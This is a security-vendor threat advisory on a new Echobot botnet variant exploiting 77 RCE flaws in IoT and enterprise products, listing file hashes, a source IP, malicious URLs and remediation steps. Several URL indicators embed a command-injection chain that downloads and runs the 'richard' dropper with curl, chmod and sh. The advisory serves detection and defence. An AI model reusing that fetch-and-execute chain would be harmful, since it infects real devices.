Rewterz Threat Advisory – CVE-2019-18261 – ICS: Omron PLC CJ, CS and NJ Series Improper Limitation of suspicious failed logins
December 13, 2019Rewterz Threat Alert – Cryptocurrency Miner Delivered via Hawkeye Keylogger
December 13, 2019Rewterz Threat Advisory – CVE-2019-18261 – ICS: Omron PLC CJ, CS and NJ Series Improper Limitation of suspicious failed logins
December 13, 2019Rewterz Threat Alert – Cryptocurrency Miner Delivered via Hawkeye Keylogger
December 13, 2019Severity
High
Analysis Summary
Echobot has evolved with a new variant that uses 77 remote code execution exploits. The 77 exploits in the current version are for products ranging from routers, IP cameras, VoIP phones, presentation systems, smart home hubs, software, data analytics platforms, biometric scanners,network-attached storage systems, thermal cameras, etc. The latest campaign had Echobot delivered from 10 different devices that had been compromised, which sheds light on the propagation mechanism. The binaries, though, are hosted at a single IP address. The malware dropper is on an open server in a file called Richard.
The exploits integrate a list of over a decade’s security flaws in multiple products like IoT devices and enterprise apps, ranging from 2009 to 2019. Indicators of compromise are listed below.
Impact
- Remote Code Execution
- Information Disclosure
Indicators of Compromise
MD5
- ed581940bb7f2b71464aaad369287984
- f2ea49f82e7ae974ffd35b2fe1734d03
- 838b5b379c4397fe98ec42d0c0032e1b
- 93f5dff8de6dd346551ca90d24f7a668
- 9e60e4da9451ef63345866705347bdc9
- 546004af0e64b6603bcb9d884044812d
- 8e15730e51dd13b2adfbd2ef5959a27f
- d5d5baf740648d3b1ee5108383176e4c
- fdc326246c0df7c4e80d920866b2613e
- 6592eae817483acd41a2a6d748b4cc7d
- 0b3ca8d7cb83c400596cad8c3643b07c
- 555371d7426a5cdc96d1f1bf9b1d1487
- 501dd0cc90f289296033ecadaa62604f
SHA-256
- a96515f745f07be9a512a2d0502c59b5ee2ef8d14ff0adaab3558e97d616c017
- 6a58e30de7842d7c30398c24395ae02762b8b7e3598bb8d2915299ee6bee7b02
- 9d0dc6705ca42183ebe0fa766d453ee90d68e38b6d6cf5745cf550ea5f2b372c
- 4ccb9683182b2c8512b12ffa1dbdf22dbad8e5cbc3bb9efb85fe3c6f2b19cba3
- 0e87d4a97b64beb7fe27e0b21d73eb0da353467d99710566dda8b07f953798ef
- db4a5bf82bffa1a5c4444facbdbf4f1c6938a7e0227c9740b3780c8659802cc0
- 1f23ddd77881a8cc95587b91c91fcf71175efafafd9b5b08c12a7e81c18ff378
- c93f08a29512132ba8ac44092613fe6a8e9e192c8155cbbd62b28823b718f7e7
- 23ff9c0f3baab717c9753604235a1069c15a5fd9b2f1a626889d7e56186dbe48
- f7568d22f7cb83f5587ced9eac15c850ea9f0a552252fe40c38369e9b17d21b7
- a88db9f571efca3adc9ca1f6958369ff41722148ac222ec47afe8bfba004988a
- c8992488a49544762eababe5cfbf5304b770c48cd5e8ae47aa71d3a013c114af
- ef5fcc5391f580ed91745b0678ee4c605e65bde3fad5e434f89372445f9a5a64
Source IP
145.249.106[.]241
URL
- http[:]//145.249.106.241/ECHOBOT.mips
- https[:]//145.249.106.241/
- http[:]//145.249.106.241/riohard
- http[:]//145.249.106.241/richard;%20curl%20-O%20
- http[:]/145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard
- http[:]//145.249.106.241/richard;%20chmod%20%20x%20richard;%20sh%20richard
- http[:]//145.249.106.241/ECHOBOT.mpsl
- http[:]//145.249.106.241/richard;chmod%20xrichard;shrichard
- http[:]//145.249.106.241/richard;chmod%20xrichard;shrichard`
- http[:]//145.249.106.241/ECHOBOT.arm
- http[:]//145.249.106.241/ECHOBOT.i686
- http[:]//145.249.106.241/ECHOBOT.m68k
- http[:]//145.249.106.241/echobot.arm4
- http[:]//145.249.106.241/echobot.arm
- http[:]//145.249.106.241/echobot.mpsl
- http[:]//145.249.106.241/ECHOBOT.spc
Remediation
- Block the threat indicators at their respective controls.
- Keep all IoT devices, enterprise applications and other products updated against known security vulnerabilities.